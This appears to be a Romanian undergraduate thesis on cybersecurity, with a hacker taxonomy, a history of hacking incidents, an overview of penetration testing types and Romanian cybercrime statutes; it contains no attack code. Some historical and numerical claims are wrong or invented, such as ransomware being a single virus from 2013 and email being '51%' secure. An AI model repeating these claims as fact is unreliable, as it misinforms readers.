FUNDAȚIA PENTRU CULTURĂ ȘI ÎNVĂȚĂMÂNT IOAN SLAVICI TIMIȘOARA [305550]

FUNDAȚIA PENTRU CULTURĂ ȘI ÎNVĂȚĂMÂNT “IOAN SLAVICI” TIMIȘOARA

UNIVERSITATEA “IOAN SLAVICI” [anonimizat].dr.ing. Gabriela – Victoria MNERIE

ABSOLVENT: [anonimizat]

2018

FUNDAȚIA PENTRU CULTURĂ ȘI ÎNVĂȚĂMÂNT “IOAN SLAVICI” TIMIȘOARA

UNIVERSITATEA “IOAN SLAVICI” [anonimizat]. Vulnerabilități, [anonimizat].dr.ing. Gabriela – Victoria MNERIE

ABSOLVENT: [anonimizat]

2018

UNIVERSITATEA DIN ORADEA

FACULTATEA de Inginerie Electrică și Tehnologia Informației

DEPARTAMENTUL Calculatoare și tehnologia informației

TEMA

Proiectul de Finalizare a studiilor a student: [anonimizat]/ei PETRESCU DARIUS

1). Tema proiectului de finalizare a studiilor: Securitatea informatică în societatea contemporană. Vulnerabilități, [anonimizat]

2). Termenul pentru predarea proiectului de diplomă : iunie 2018

3). Elemente inițiale pentru elaborarea proiectului de finalizare a studiilor :

4). Conținutul proiectului definalizare a studiilor :

INTRODUCERE

Capitolul I INFORMAȚII GENERALE DESPRE CYBER SECURITY

Capitolul II TOTUL DESPRE PROGRAMELE BUG BOUNTY

Capitolul III Descoperirea vulnerabilitățiilor

CONCLUZII ȘI RECOMANDĂRI

BIBLIOGRAFIE

5). Material grafic:

6). Locul de documentare pentru elaborarea proiectului de diplomă:

Universitatea „Ioan Slavici” Timișoara

7). Data emiterii temei : 23 noiembrie 2017

Coordonatorștiințific,

Conf.dr.ing.ec. Gabriela Victoria MNERIE

REFERAT

PRIVIND PROIECTUL DE DIPLOMĂ

A

ABSOLVENT: [anonimizat] / ABSOLVENT: [anonimizat] : PETRESCU DARIUS

DOMENIUL Calculatoare și tehnologia informației

SPECIALIZAREA Tehnologia informației

PROMOȚIA 2018

Titlul proiectului Securitatea informatică în societatea contemporană. Vulnerabilități, [anonimizat] ……………………………………………………………………………………….

INTRODUCERE

Capitolul I INFORMAȚII GENERALE DESPRE CYBER SECURITY

Capitolul II TOTUL DESPRE PROGRAMELE BUG BOUNTY

Capitolul III Descoperirea vulnerabilitățiilor

CONCLUZII ȘI RECOMANDĂRI

BIBLIOGRAFIE

Aprecieri asupra conținutului proiectului de DIPLOMĂ (finalizare a studiilor), [anonimizat], actualitate, [anonimizat] a fi atinse.

Într-un domeniu în continuă evoluție, s-a [anonimizat], menține actual dezideratul de a [anonimizat] o reală importanță.

Aprecieri asupra proiectului (se va menționa: [anonimizat], calitatea și diversitatea surselor consultate; modul în care absolvent: [anonimizat], în număr de 15, s-a asigurat o calitate și o [anonimizat]: [anonimizat], este suficientă pentru a evidenția principalele surse și titluri bibliografice folosite în lucrare

(se va menționa: opțional locul de documentare și modul în care absolventul a realizat cercetarea menționându-se contribuția autorului)

Documentarea s-a făcut la biblioteca universității, în laboratoarele de calculatoare a Universității Ioan Slavici din Timișoara.

Contribuția autorului a constat în stabilirea structurii, configurării și modelului aplicației.

Concluzii (coordonatorul proiectului trebuie să aprecieze valoarea proiectului întocmit, relevanța studiului întreprins, competențele absolventului, rigurozitatea pe parcursul elaborării proiectului, consecvența și seriozitatea de care a dat dovadă absolventul pe parcurs)

………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………….

Redactarea proiectului respectă ………………………………………………….cerințele academice de redactare (părți, capitole, subcapitole, note de subsol și bibliografie).

Consider că proiectul îndeplinește/ nu îndeplinește condițiile pentru susținere în sesiunea de Examen de LICENȚĂ (finalizare a studiilor) din IULIE 2018 și propun acordarea notei ………………

Oradea,

Data Coordonator științific

Conf.dr. MNERIE Gabriela – Victoria,

CUPRINS

INTRODUCERE

Securitatea informatică este una dintre cele mai importante subiecte internaționale la ora actuală. Mediile guvernamentale, corporațiile, administrațiile centrale și locale, dar și mediul privat, băncile au nevoie de securitate atât defensivă cât și ofensivă pentru a stopa pierderile de date suferite.

Securitatea informatică, văzută ca un nou cadru de securitate și amenințări reprezintă principalul subiect de dezbatere în lumea contemporană.

Tema aceastei lucrări, are ca scop, prezentarea unor probleme de securitate informatică. Principalele aspecte parcurse în această lucrare sunt identificarea vulnerabilităților, tipurile de vulnerabilități informatice, descrierea programelor de tip Bug Bounty pentru protecția datelor din aplicațiile respective. Infracțiunile informatice sunt în continuă creștere, iar multe întreprinderi mai mici sunt extrem de vulnerabile ca urmare a securității cibernetice ineficiente. Soluțiile de securitate I.T sunt esențiale pentru toate tipurile de întreprinderi, în special atunci când vă gândiți la cât de important este internetul și sistemele dvs. digitale pentru operațiunile de zi cu zi.

Majoritatea întreprinderilor care au fost ținta unor atacuri cibernetice, au avut de suferit ca urmare a scăderii încrederii clienților și a furtului de date personale. Protecții împotriva hacker-ilor, există. Problema principală, este că regulile și protecțiile pot fi încălcate. Oricât de sigure ar fi sistemele de securitate și de complexe, ele pot fi ocolite.

Capitolul I

INFORMAȚII GENERALE DESPRE CYBER SECURITY

I.1. Introducere în securitate informatică

Securitatea informatică, văzută ca un nou cadru de securitate și amenințări este principalul subiect de dezbatere în această lucrare. Pe lângă principalele riscuri și amenințări, se vor prezenta tehnici dar și importanța programelor dezbătute de companiile mari pentru a stopa criminalitatea informatică.

După părerea specialiștilor, calculatorul, tableta sau telefonul este și va fi cea mai bună modalitate de stocare a datelor personale. Chiar dacă deținem un computer personal, un telefon mobil sau smartphone, tabletă, ceas digital sau alte aparate electronice, suntem conectați la internet. Internetul este ca o pânză de păianjen, cu dispozitive electronice, interconectate, fie prin cablu, fie prin satelit sau prin tehnologie wireless. Internetul are rolul principal prin aceste dispozitive electronice de a ușura munca, de a aduce beneficii pe multe planuri, ajutând oamenii. Este bine de știut că timpul este cel mai prețios lucru al omului. Odată cu tehnologia avansată, apar din ce în ce mai multe probleme legate de dispozitivele electronice.

Există aspecte cu referire la pierderile economice substanțiale, pe care le pot creea vulnerabilitățile în sistemul informatic al unui sistem sau instituții. Furturile pe internet, fraudele informatice, dar și spionajul cibernetic sunt provocări reale pentru orice companie ce folosește structura I.T la maxim.

Ce este important de menționat faptul că specialiștii în securitate informatică ce au găsit vulnerabilități în sistemele internaționale, guvernamentale și le-au exploatat cu scopul de a sustrage anumite bunuri, nu se numesc specialiști în securitate ci hackeri black-hat sau cei răi.

Zilnic apar din ce în ce mai multe noutăți în lumea tehnologiei și se poate spune că în viitor vom fi încojurați la propriu de tehnologie deoarece este un mod eficient de a avea un avantaj în lupta cu timpul.

În contextul amenințărilor zilnice răspunsul împotriva atacurilor nu este foarte rapid.

Nimeni nu poate prevedea când, unde și ce va ataca un hacker. Fie că acesta caută simple date sau dorește să obțină access pentru a-și demonstra inteligența, datele exacte ale atacului nu sunt știute de nimeni, la fel și țintele pe care aceștia vor să le atace.

Trebuie analizat din perspectivă practică și nu din perspectivă media. Pentru a opri atacurile informatice este nevoie de un plan bine elaborat, dar nu pentru atacatori ci obligatoriu pentru cei ce administrează sistemele informatice, deoarece acești specialiști trebuie pregătiți pentru a opri atacurile informatice la timp. Sunt necesare resurse hardware, dar și suport.

Trebuie specificat că din societatea informațională nu face parte doar internetul, ci este o sumă a grupurilor tehnologice moderne. Noțiunea de spațiu cibernetic a fost lansat în 1982 de către un scriitor provenind din Canada. Ciberspațiul trebuie săni-l imaginăm că un complex sau ca un Univers Interconectat unde totul are un sens și practicul devine cel mai utilizat.

Pentru început, trebuie explicat de ce este importantă securitatea informatică în noul cadru de securitate. Astăzi, societatea modernă este informatizată în proporție de 100% și arată o realitate în care se ignoră complet amenințările venite din mediul virtual. Economia, infrastructura, telecomunicațiile, comunicarea, politica, societatea se bazează din ce în ce mai mult pe informatică și tehnologie. De asemenea, firmele din sectorul public și privat, guvernele, organismele internaționale și naționale, băncile, învățământul, toate au nevoie de tehnologie pentru dezvoltare și o bună comunicare și beneficiează de toate aceste forme de informare și comunicare într-un mod permanent.

În aceste ipostaze, securitatea informatică a devenit una din componentele importante ale internetului. Analiștii securității informatice au observat o contradicție între nevoia de comunicație și conectivitate dar și necesitatea asigurării transportului sigur al datelor și asigurarea confidențialității, autenticității și a integrității informațiilor. Domeniul este relativ nou, cel al securității informatice și se cauta soluții pentru rezolvarea problemelor de securitate care vor exista și vor fi la un nivel mai dezvoltat în viitor.

Viteza și securizarea comunicațiilor a documentelor și mesajelor oferă numeroase atuuri actualului decizional într-o societate modernizată, bazată pe folosirea serviciilor de poștă electronică, transfer electronic, transfer bancar, bazat pe un sentiment fals de încredere spre securitatea informatică, utilizatorii de internet având o părere foarte bună despre securitatea informatică și siguranța transportului, dar necunoscându-se că peste 80 % din rețele sunt nesigure și se pot fura datele personale sau se pot insera date false, denaturate de realitate.

Sistemele informatice sunt amenințate din mai multe puncte, fie din exterior fie din interior. Pot fi persoane bine intenționate care, fie printr-o greșeală de operare, au produs un fals-pozitiv, adică sistemul a perceput o vulnerabilitate, aceasta fiind inexistentă dintr-o greșeală de calcul sau există persoanele rău intenționate ce își dedică timp și bani pentru a penetra un sistem informatic obținând anumite informații din acel sistem. Dintre factorii tehnici care permit găurile de securitate se pot enumera erorile software-ului de lucrare sau de comunicare, defecte ale echipamentelor de comunicație sau de calcul, greșeli la proiectare. Folosirea abuzivă a sistemelor de calcul precum neverificarea acestora, reprezintă unul din factorii de risc major privind securitatea sistemelor de calcul și a celor informatice.

Toate sistemele sunt vulnerabile la penetrări neautorizate, la modificări sau distrugeri de date sau programe. Aceste sisteme informatice sunt vitale pentru: bănci, industria de apărare, spitale, burse de valori, oferind un cadru de atacuri cyber-teroriste. Tendința principală este cea de extindere a comunicațiilor sau a internetului, acest fact amplificând vulnerabilitățile și va face dificilă localizarea unui defect în sistemul informatic, a unui punct vulnerabil rețea afectând întreg sistemul.

Se consideră că internetul, este unul dintre cele mai complexe sisteme create de tehnologia umană, care, împreună cu sistemul financiar, nu poate fi controlat 100%. Vulnerabilitățile sistemelor informatice pot aduce pierderi foarte mari, de ordinul miliardelor de dolari, dar fac posibilă și scurgerea de informații clasificate, fie cu caracter militar, economic sau personal.

Securitatea informatică văzută ca un nou cadru de securitate și amenințări este principalul subiect de dezbatere în această lucrare.

După părerea specialiștilor, computerul, tableta sau telefonul este și va fi cea mai bună modalitate de stocare a datelor personale. Chiar dacă deținem un computer personal, un telefon mobil sau smartphone, tabletă, ceas digital sau alte aparate electronice, suntem conectați la internet. Internetul este ca o pânză de păianjen, cu dispozitive electronice, interconectate, fie prin cablu, fie prin satelit fie prin tehnologie wireless. Internetul are rolul, prin aceste dispozitive electronice de a ușura munca, de a ne aduce beneficii pe multe planuri, ajutându-ne de a salva timp. Este bine de știut că timpul este cel mai prețios lucru al omului. Odată cu tehnologia avansată, apar din ce în ce mai multe probleme în dispozitivele electronice.

Societatea informațională este o nouă societate, prin care, consumul de noutăți și informații este segmentul principal, celelalte segmente ca tehnologia, comunicațiile, sunt doar o parte din întreg. Trebuie să înțelegem de ce este important de analizat securitatea informației prin prisma societății informaționale.

Într-o lume în care timpul este factorul decizional și cel mai important din viața unui individ, dimensiunile scalabile sunt: societatea socială, culturală, economică, educațională, politică și tehnologică. Acest set de valori definesc piramida informațională, prin care, este nevoie de un model de comunicare, cu receptor-transmițător și mesaj. În această societate informațională, unde avem rolul de receptori și transmițători a unui mesaj, fie prin intermediu fizic, fie prin intermediu media, ne dorim să fim siguri că acel mesaj ajunge la destinație și este înțeles.

Un exemplu de mesaj, este mesajul pe care (emițătorul) îl transmite către public selectat la întâmplare. Publicul are rol de (receptor) al mesajului pe care emițătorul l-a transmis. Dar dacă se vrea să comunice mesajul doar unui singur individ din acel grup? Atunci apare confidențialitatea informației. Confidențialitatea informației constă în protecția datelor pe care un emițător vrea să le transmită unui receptor. Cu siguranță, pot fi mai mulți receptori, dar mesajul, informația trebuie livrate fără a fi făcute publice. Aici apare confidentul mesajului său protecția datelor.

Protecția datelor se poate referi la criptarea mesajului, semne și protecții cunoscute doar între emițător și receptor. Așa se poate imagina și sistemul de funcționalitate, al email-ului. De exemplu, pentru a transmite un mesaj către un individ, aleg să mă conectez pe contul de email. În proporție de 51%, datele mele și mesajul pe care doresc a-l comunica este sigur. Proporția de 49%, se referă la insecuritate.

Insecuritatea datelor sau a informației există, deoarece, există vulnerabilități în aplicațiile de email sau de transmitere a datelor și pentru rezolvarea lor, companiile plătesc ingineri de securitate pentru a rezolva problemele descoperite. Toate aplicațiile sunt vulnerabile în proporție de 80-90% sau toate sistemele informatice în proporție foarte mare sunt vulnerabile. Tot ce a fost construit de om, poate fi distrus tot de om. Revenind la email, sunt foarte multe metode prin care se poate afla atât parola contului pe care l-am folosit în transmiterea informației cât și pentru decriptarea mesajului.

Aparația termenului de disponibilitate se referă de cele mai multe ori la disponibilitatea permanentă a cuiva de a rezolva, chestiona sau de a integra ceva, urgent. Disponibilitatea în sistemele informatice este cea mai radicală soluție care trebuie să existe. Disponibilitatea în domeniul tehnologiei este cea care face diferența dintre trecut și viitor. Disponibilitatea implică cercetare, inovare, sustenabilitate și control în mari proporții a unui sistem. Prin disponibilitate înțelegem suportul activ, multi-prezent.

A III-a componentă, este integritatea, ce oferă cadrului larg, perspectiva de cinste, asumarea unor valori. A III-a componentă se reflectă prin securizarea comunicațiilor, pentru a oferi integritate informațiilor.

Securitatea informatică constă în contracararea si protejarea unui sistem împotriva riscurilor și vulnerabilităților. La ora actuală, triada C.I.A este un pas important în alcătuirea unui plan de prevenire a vulnerabilităților.

Triada C.I.A este alcătuită din:

Confidențialitate – previne declasificarea informațiilor. Se împarte în posesie, controlul acceselor, controlul sistemelor folosite în operațiuni, proprietate.

Integritate – Menține datele corecte fără ca acestea să fie alterate de alte surse. Principalele caracteristici ale acesteia sunt: autenticitate, calitate, configurarea sistemelor, utilitate, validitate.

Valabilitate – Când un sistem principal s-a oprit din cauza unei erori de natura umană sau tehnologică, apoi, un alt sistem preia funcțiile sistemului principal. Acest tip de sistem se mai numește și sistem redundant. Principalele caracteristici sunt: siguranță, continuitate.

Figura 1. 1– Triada C.I.A

Conceptul de securitate se structurează pe III nivele și anume:

Securitatea fizică: Securitatea fizică se referă la protecția datelor, a informației prin dispozitive fizice ce au rolul de a preveni, bloca accesul la informații a unor persoane rău intenționate.

Se apreciază la ora actuală că furtul de informații dar și distrugerile acestora provin din cauza securității slabe a sistemelor. Acest lucru constituie al II-lea punct de referință pentru insecuritate.

Securitatea logică: se referă la ansamblul de metode folosit pentru a acorda privilegii și drepturi unor grupuri, persoane pentru a utiliza în condiții normale un sistem informatic, un complex informatic sau o bază de date.

De cele mai multe ori insecuritatea este cea mai des întâlnită aici. Securitatea logică se referă la partea software. Partea software este partea unui sistem ce controlează un ansamblu de operații logice pentru a efectua operații. Aici apar de cele mai multe ori problemele de software datorită mai multor factori. Cea mai mare insecuritate apare aici.

Nivelele de securitate ce se acordă în acest grup, sunt:

A. Nivelul de acces la sistem: acest nivel se ocupă pentru a acorda trecerea unui potențial utilizator în sistem. De cele mai multe ori, este văzut ca un întrerupător.

B. Nivelul de validare a contului: acest nivel verifică dacă utilizatorul are un profil de validare și de accesare a drepturilor de acces.

C. Nivelul drepturilor de acces: după ce utilizatorul trece prin cele două filtre, ultimul nivel se referă la drepturile pe care acesta deține într-un sistem.

Securitatea juridică: Securitatea juridică se referă la legi și ordonanțe de urgență privind celelalte niveluri de securitate, precum și pedepsirea folosirii neautorizate a sistemelor informatice sau furtul de informații. Acest tip de securitate are rolul de a descuraja potențialii hoți.

Cele 3 nivele de securitate sunt necesare pentru a ține sub control un sistem informatic. Noul cadru de analiză prin care este realizat controlul sistemului informatic este de cele mai multe ori controlat prin mai multe protocoale pentru buna desfășurare a sistemului în condiții optime.

Tehnologia unui sistem de securitate are multiple părți. Conceptul de securitate este bazat pe inteligență distribuită cu ajutorul tehnologiei. Operația de alarmare, stoparea funcțiilor sau a sistemului, întreruperea comunicațiilor reprezintă un nivel de tehnici și precauții pentru a proteja sistemul împotriva invadatorilor.

Tipuri de hackeri:

White Hat (Ethical Hacker) sau cei "cu pălărie albă" sunt persoanele, ce operează respectând un cod neoficial, dar care, datorită priceperii lor ajung să fie implicați în dezvoltarea siguranței sistemelor informatice sau chiar în combaterea fraudelor informatice, fiind angajați de organizații guvernamentale sau de firme din domeniul I.T. Spărgând uneori sistemele informatice, semnalează administratorilor de sistem deficiențele sistemului și propun soluții de securizare.

Grey Hat („Cenușii”), sparg sistemele vulnerabile anunțându-i apoi pe administratorii sistemelor că le-au "spart" rețeaua și se oferă să repare vulnerabilitățile în schimbul unei sume de bani.

Black hat – („Crackers”) sau cei cu „pălarie neagră” sunt cei răi, care de obicei dețin cunoștințe de programare și care sunt specializați în furat.

Hacktiviștii, se infiltrează în sisteme informatice pentru a-și promova astfel ideile, concepțiile – un tip de activism social sau motivat politic, realizat prin explotarea – ilegală – a imenselor posibilități oferite de internet.

Figura 1. 2- Tipuri de hackeri

Cercetările în domeniu relevă faptul că hackerii sunt persoane, cu vârste cuprinse între 13-45 ani, provenind din medii sociale și culturale diferite. De cele mai multe ori, copii nesupravegheați provenind fie din familii cu venituri materiale substanțiale, benefiicind de caculatoare performante și cei din familii unde resursele materiale sunt insuficiente, dar care de multe ori apelează la un internet caffe pentru a se conecta la lumea virtuală. Acolo, se regăsesc, își găsesc prieteni și își testează capacitățile.

Dacă la început, o simplă ,,joacă pe calculator” reprezintă o oază de autocunoaștere și autodepășire, cu timpul, totul se transformă într-un mod de a fi recunoscut, apreciat și recompensat. De multe ori, o persoană devine hacker pentru că vrea să demonstreze virtual că este bun în ceea ce face și apoi dorește recunoașterea.

I.1.2 Istoria securității informatice

Termenul de securitate informatică a fost cunoscut încă din anii 1960. În 1960, expert în informatică William Mathews de la M.I.T sau Massachusetts Institute of Technology a găsit o vulnerabilitate într-un serviciu ce rula într-un IBM 7094, acesta fiind unul dintre primele calculatoare funcționale. William Mathes a găsit o vulnerabilitate ce consta în descoperirea parolei sistemului, ce se afla în fișierele temporare în text normal.

În 1981 s-a înființat Chaos Computer Club în Germania. Tot în 1981, în Statele Unite ale Americii s-a înființat Black Bart, o grupare de hackeri, coderi și experți în securitate. Unul dintre membrii, Tuxedo, a creat un instrument pentru a asculta dar și pentru a iniția convorbiri telefonice. Un alt membru important al grupării a fost Captain Zap, care a fost primul cracker sau hacker cu pălărie neagră care a reușit să intre în serverele AT&T în 1981, unde, odată intrat, a schimbat timpul serverului și a cauzat câteva probleme cu platforma de facturi.

În 1983, The 414s, sau un grup de coderi, hackeri și crackeri au intrat în 60 de calculatoare ce aparțineau instituției publice Los Alamos dar și a unui centru de cancer din Manhattan. Incidentul a fost publicat de revista Newsweek cu titlul: ,,Atenție: Hackerii la joacă”. Atunci au apărut primele denumiri ale hackerilor. Tot în 1983, a apărut filmul ,,WarGames”, care introducea publicului fenomenul hackingului dar și abilității unui tânăr adolescent, specialist în informatică ce avea capabilitatea de a intra în serverele unui laborator nuclear.Tot în 1983, apar primele informații despre hacking și securitatea informatică.

În Decembrie 1983, Ken Thomson, un specialist în informatică la M.I.T a menționat pentru prima dată ,,Calul Trojan” că vulnerabilitate informatică sau ca un virus.

În 1984, Lex Luthor a înființat ,,Legion of doom” sau Legiunea Distrugerii.

A avut loc conferința de comunicări ,,Chaos”, în Hamburg, Germania, fiind prima conferință a celor pasionați de securitate informatică.

În 1985, s-a publicat în Marea Britanie Cartea Hackerilor și s-a înființat ziarul online Phrack.

În 1986 Robert Schifreen și Stephen Gold sunt acuzați pentru accesarea ilegală a serverelor Telecom Gold. Dar, aceștia au fost eliberați, deoarece constituția nu prevedea definiția unui ,,hacker”.

În 1987, apar primele informații despre un posibil virus ce a cauzat probleme în rețelele VNET, EARN și BITNET.

În 1988, Morris Robert, de la Universitatea Cornell, a lansat virusul Morris în ARPA Net, rețea informatică ce aparținea guvernului Statelor Unite ale Americii, ARPA Net fiind precursorul Internetului. Virusul a atacat 6000 de calculatoare. Acesta, a fost suspendat de la facultate și a fost amendat cu 10.000 dolari americani.

În 1988, Chicago Bank, a fost victima unui furt de 70 milioane dolari. Autorul nu a fost găsit nici astăzi.A fost creat un centru de răspuns al problemelor pentru computere pentru a monitoriza rețelele.

Un virus numit ,,Părintele Crăciunului” s-a răspândit în rețeaua DECNet.

Anii 1990 aduc multe îmbunătățiri în timpul de execuție al programelor. Totul evoluează la alt nivel.

,,Operațiunea Sundevil” are loc din Ianuarie până în Septembrie 1990. Membrii ai ,,Legion of doom” dar și al altor grupări, ce s-au ocupat cu fraudă telefonică, furtul de cărți de credit au fost arestați.

În Marea Britanie se introduce Actul 1990 ce prevedea pedepsirea celor care intră neautorizați într-o rețea sau computer.

În 1991, 1992 nu au existat incidente internaționale sau majore.

În 1993 are loc conferința DEF CON, prima conferință pentru pasionații de criminalitate informatică, informatică. A avut loc la Las Vegas și a avut un succes atât de mare, încât se desfășoară în fiecare an inclusiv în prezent.

În 1994, crackeri ruși au furat din Citibank 10 milioane de dolari și i-au tranferat în conturi bancare răspândite internațional. După ce s-au pus bazele World Wide Web, sau a internetului, hackerii s-au adaptat repede.

În 1995 FBI-ul a arestat gruparea intitulată ,,Maeștrii Telefoanelor”. Aceștia erau specializați în furtul de date de la companiile telefonice și utilizarea acestora în scopuri personale, dar și ilegale în același timp.

În 1996, o grupare de hackeri au spart site-ul Departamentului Justiției al Americii, al C.I.A, în Octombrie și al U.S Air Force.

Gruparea de hackeri, Brotherhood au spart serverele companiei ,,Canadian Broadcasting”.Departamentul de Apărare al Statelor Unite, au afișat un raport de 65% din 250.000 de încercări reușite de penetrare a sistemelor.

În 1997, un tânăr croat de 15 ani, a penetrat computerele armatei U.S.A din Guam.

A avut loc primul atac reușit împotriva unui server Windows.

În 1998 Yahoo anunța că utilizatorii s-ar putea să fii descărcat un worm care se autoexecuta și fura datele personale ale utilizatorilor.

Anul 1999 este anul securității informatice și a hacking-ului. Multe programe de securitate apar, mulți viruși sunt descoperiți, multe probleme se repară și sunt lansate soluții anti-hacking.

Pentagonul, este atacat, atacatorii reușind să țină serverele pentagonului, inactive timp de o săptămână.

Președintele Bill Clinton anunță 1.46 miliarde dolari pentru inițiativa guvernului, securitatea informatică. Planul a fost de a crea un birou special sau a unui departament special ce se ocupă de monitorizarea rețelelor și a site-urilor guvernamentale.

În august, Kevin Mitnick, unul dintre cei mai mari hackeri și programatori ai anilor 1990, a fost condamnat la 5 ani de închisoare.

Anii 2000, revin în forță cu tehnici impresionante în lumea tehnologiei și a securității informatice mondene.

La începutul anilor 2000, a fost creat virusul ILOVEYOU, care era scris în vbscript. Această scrisoare a infectat milioane de computere din întreaga lume. La începutul anilor 2000 a fost un virus foarte sofisticat. Încă nu se cunoaște de cine a fost creat.

Porțiuni de cod din worm-ul ILOVEYOULETTER aveau ca destinatari persoanele ce foloseau un serviciu de mail, la ora aceea, cele mai folosite fiind Yahoo și Aol. Majoritatea persoanelor foloseau Windows ca sistem de operare. Această scrisoare era un virus ascuns, care odată descărcat se auto-executa în calculatorul victimei și afecta regiștrii sistemului de operare. Se presupune că autorul, a sustras date în valoare de peste 200 milioane dolari cu acest virus.

Tot în 2000, tânărul hacker Jonathan James a fost primul care a ispășit pedeapsa cu închisoarea pentru activități de hacking.

În 2001, Microsoft a fost ținta atacului DDOS, multe dintre serverele Microsoft au fost compromise.

Programatorul Rus Dmitry Skylarov a fost arestat la conferința anuală DefCon 2001, pentru încălcarea legii copyright-ului. Acesta a fost primul om incriminat pentru o infracțiune cibernetică.

În 2003, s-a format grupul Anonymous.

În 2004 a fost arestat Myron Tereshchuck pentru încercarea de a fura 17 milioane de dolari de la compania Micropatient.

Tot în 2004 , Coreea de Nord printr-un comunicat au precizat că au antrenat peste 500 de hackeri care au atacat cu succes sistemele informatice guvernamentale ale Coreei de Sud, Japoniei și a aliaților acestora.

În 2005, Rafael Nunez care a fost membrul unuei grupări intitulate ,,World of Hell” a fost arestat pentru că a luat accesul la sistemele informatice apartining aeroportului internațional Miami.

În septembrie, Cameron Lacroix este condamnat la 11 luni de închisoare pentru că a penetrat sistemele informatice ce aparțineau T-Mobile.

În 2006, a fost descoperit un worm care avea rolul de a ataca sistemele bazate pe linux și de a se autopropulsa sau de a migra dintr-un server în altul. Acest worm era primul worm ce avea capabilitate de migrare. A fost numit în media ,,Kama Sutra” sau ,,Black Worm”.

În mai, James Jeanson a fost condamnat la 3 ani de închisoare deoarece a penetrat mai multe agenții guvernamentale.

Tot în mai, s-a înregistrat cel mai mare atac informatic din istorie, aproximativ 21,500 de mii de site-uri au fost penetrate de un hacker turc.

În anii 2007, 2008, 2009 au fost anii dezvoltării securității informatice, atunci au apărut numeroase vulnerabilități, exploituri. Au existat numeroase atacuri, dar nu a existat unul foarte important.

În 2010 a fost descoperit virusul StuxNet, un virus inteligent, care se răspândea doar prin anumite modele de sistem și anume SCADA.

Anii următori, până în prezent au fost anii de ,,glorie” ai crackerilor. Din 2011 până în 2014 au existat sute de mii de atacuri înregistrate cu succes și milioane de alerte.

În 2013 a apărut un virus numit Ransomware ce are ca scop criptaterea hardului unui utilizator atacat.

I.2.1 Penetration Testing

Ce înseamnă Penetration Testing ?

Penetration Testing mai este cunoscut ca și pen testing. Este procesul prin care se încearcă de a identifica anumite probleme de securitate într-un sistem, prin care un atacator poate să compromită total ori parțial sistemul respectiv. Mai exact, reprezintă simularea unui atac informatic cu scopul de a identifica anumite probleme de securitate.

Figura 1. 3– Penetration Testing

Ce este un Pentester ?

Este o persoană specializată în domeniul securității, care are anumite abilități și care le foloseste în scopuri defensive, de a descoperii probleme de securitate într-o rețea, aplicație sau într-un sistem. Un penetration tester, previne aceste atacuri, prin care un hacker ar putea provoca anumite daune, cum ar fi: financiare, materiale, scurgeri de informații confidențiale, ș.a.m.d.

Figura 1. 4- Pentester

I.2.2 Tipuri de Penetration Testing:

Testarea Black-Box: Cunoscută și sub denumirea de "functional testing", este o metodă de testare a software-ului în care structura internă, proiectarea și implementarea a elementului testat nu este cunoscut de către tester.

Figura 1. 5– Black Box Testing

Testarea White-Box: Cunoscută și sub numele de "clear box testing" sau "structural testing", este o metodă de testare a software-ului în care structura internă, proiectarea, implementarea elementului testat este cunoscută de catre tester.

Figura 1. 6 – White Box Testing

Testarea Gray-Box: Testerul are cunoștințe limitate despre detaliile interne ale programului. O cutie gri este un dispozitiv, program sau sistem a cărui funcționare este parțial înțeleasă.

Figura 1. 7 – Gray Box Testing

I.2.3 Diferența dintre Hacker și un Pentester

Ceea ce îl face diferit pe un Pentester, este că acesta are doar permisiunea clientului ca să testeze sistemul respectiv. Metodele sunt aceleași și modul de operare.

Regulile pe care un pentester le are:

A. Trebuie să urmeze regulile date de către angajator.

B. Nu are voie să divulge vulnerabilitățiile pe care le-a găsit. În afară, de persoana care l-a angajat.

C. El va trebui sa testeze aplicația pentru toate tipurile de vulnerabilități. Nu doar pentru cele care au un impact critic, care pot oferii acces la întregul sistem.

D. Infrastructura clientului nu are voie s-o distrugă.

Terminologie:

În orice arie profesională, întelegerea acestor termeni este cheia esențială. Acest lucru, ne face ca să întelegem mult mai bine domeniul respectiv, dar și de a avea o comunicare eficientă cu colegii tăi. Trebuie să ne asigurăm că toată lumea vorbește "aceeași limbă".

Permisiunea de testare:

În cazul în care lucrați ca Freenlancer și nu într-o companie care se ocupă cu testarea securității, trebuie să ținem cont de următorul lucru. Indiferent, care este mărimea companiei, trebuie să cerem permisiunea de testare înainte de a ne începe activitatea. Cererea permisiunii de testare se face în scris. În Romania, există anumite legi care fac referire la securitatea informatică. Dacă ignorăm aceste legi, ele ne duc la niște consecințe neplăcute, cum ar fi, arestul.

Mai jos, vom putea găsii niște legi:

Art.42 – (1) Accesul, fără drept, la un sistem informatic constituie infracțiune și se pedepsește cu închisoare de la 3 luni la 3 ani sau cu amendă.

(2) Fapta prevăzută la alin.(1), săvârșită în scopul obținerii de date informatice, se pedepsește cu închisoare de la 6 luni la 5 ani.

(3) Dacă fapta prevăzută la alin.(1) sau (2) este săvârșită prin încălcarea măsurilor de securitate, pedeapsa este închisoarea de la 3 la 12 ani.

Art.43 – (1) Interceptarea, fără drept, a unei transmisii de date informatice care nu este publică și care este destinată unui sistem informatic, provine dintr-un asemenea sistem sau se efectuează în cadrul unui sistem informatic constituie infracțiune și se pedepsește cu închisoare de la 2 la 7 ani.

(2) Cu aceeași pedeapsă se sancționează și interceptarea, fără drept, a unei emisii electromagnetice provenite dintr-un sistem informatic ce conține date informatice care nu sunt publice.

Art.44 – (1) Fapta de a modifica, șterge sau deteriora date informatice ori de a restricționa accesul la aceste date, fără drept, constituie infracțiune și se pedepsește cu închisoare de la 2 la 7 ani.

(2) Transferul neautorizat de date dintr-un sistem informatic se pedepsește cu închisoare de la 3 la 12 ani.

(3) Cu pedeapsa prevăzută la alin.(2) se sancționează și transferul neautorizat de date dintr-un mijloc de stocare a datelor informatice.

Art.45 – Fapta de a perturba grav, fără drept, funcționarea unui sistem informatic, prin introducerea, transmiterea, modificarea, ștergerea sau deteriorarea datelor informatice sau prin restricționarea accesului la aceste date constituie infracțiune și se pedepsește cu închisoare de la 3 la 15 ani.

Art.46 – (1) Constituie infracțiune și se pedepsește cu închisoare de la unu la 6 ani:

a) fapta de a produce, vinde, de a importa, distribui sau de a pune la dispoziție, sub orice altă formă, fără drept, a unui dispozitiv sau program informatic conceput sau adaptat în scopul săvârșirii uneia din infracțiunile prevăzute la art.42-45;

